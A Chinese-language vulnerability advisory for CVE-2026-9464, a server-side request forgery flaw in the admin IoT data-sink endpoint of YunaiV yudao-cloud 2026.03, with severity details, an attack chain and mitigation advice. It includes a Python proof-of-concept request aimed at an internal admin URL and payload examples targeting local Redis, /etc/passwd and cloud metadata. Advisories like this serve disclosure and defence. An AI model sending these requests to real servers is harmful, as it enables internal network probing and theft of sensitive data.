CVE-2026-9464: yudao-cloud存在服务器端请求伪造漏洞

漏洞信息

漏洞编号

CVE-2026-9464

漏洞类型

服务器端请求伪造 (SSRF)

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

YunaiV yudao-cloud

漏洞概述

YunaiV yudao-cloud 2026.03 版本中的 Admin API Endpoint 组件存在安全漏洞。问题出在 `/admin-api/iot/data-sink/create` 接口的 `IotDataSinkHttpConfig` 函数中。由于对传入的 HTTP 配置参数缺乏有效的校验，攻击者可构造恶意请求诱导服务器向内网发起请求，导致服务器端请求伪造 (SSRF)。该漏洞可被远程利用，且已有公开 PoC，厂商尚未修复。

技术细节

该漏洞源于 YunaiV yudao-cloud 系统 IoT 数据接收配置模块的输入验证缺失。具体而言，在处理 `/admin-api/iot/data-sink/create` 请求时，`IotDataSinkHttpConfig` 函数直接解析用户提供的 HTTP 配置参数，并将目标 URL 用于后续的服务器请求构建过程中，未对目标地址范围进行严格限制。

攻击者需拥有管理员权限 (PR:H)，通过向受影响接口发送特制的 POST 数据包，将 `url` 或类似字段指定为内网敏感地址（例如 `http://127.0.0.1:6379` 或 `file:///etc/passwd`）。应用服务器在接收到配置后会尝试连接该目标，从而实现 SSRF。利用此漏洞，攻击者可以绕过防火墙限制，探测内网资产，读取本地元数据，甚至结合其他漏洞对内网服务进行攻击。由于厂商暂未修复，该风险对处于内网环境中的 yudao-cloud 实例构成实质性威胁。

攻击链分析

STEP 1

步骤1：权限获取

攻击者需要获取系统的高级管理员权限（PR:H），这可能通过钓鱼攻击、凭证撞库或利用其他漏洞实现。

STEP 2

步骤2：构造恶意请求

攻击者向 `/admin-api/iot/data-sink/create` 接口发送 POST 请求，在 `IotDataSinkHttpConfig` 参数中填入内网地址（如 127.0.0.1）或云元数据地址。

STEP 3

步骤3：服务端请求发起

服务器端接收到请求后，解析配置并尝试向攻击者指定的内网地址发起 HTTP 连接，导致请求被发送到内部网络。

STEP 4

步骤4：信息泄露或内网探测

根据内网服务的响应，攻击者可能获取敏感信息（如 AWS/GCP 元数据）、探测内网端口拓扑或利用 Gopher 协议攻击内部数据库。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target-domain/admin-api/iot/data-sink/create"

# Headers, simulating an authenticated admin user (PR:H required)
headers = {
    "Content-Type": "application/json",
    "Authorization": "Bearer <Admin_Access_Token>"
}

# Malicious payload demonstrating SSRF
# Attacker attempts to force the server to request an internal resource
payload = {
    "name": "malicious_sink",
    "type": "HTTP",
    "config": {
        "url": "http://127.0.0.1:8080/internal-admin", 
        "method": "GET"
    }
}

try:
    response = requests.post(url, json=payload, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully, check internal logs for SSRF trigger.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

YunaiV yudao-cloud 2026.03

防御指南

临时缓解措施

在应用防火墙（WAF）层面对 `/admin-api/iot/data-sink/create` 接口的请求体进行严格过滤，拦截包含内网IP段或本地回环地址的参数。同时，在网络层面限制服务器对外部非业务必要端口的出站连接，以阻断SSRF攻击的利用路径。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-9464
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-9464
3 Details https://www.cvedetails.com/cve/CVE-2026-9464/
4 VulDB https://vuldb.com/cve/CVE-2026-9464
5 Link https://github.com/fakebug111/my_public_bug/blob/main/issus05.md
6 Link https://vuldb.com/submit/813962
7 Link https://vuldb.com/vuln/365445
8 Link https://vuldb.com/vuln/365445/cti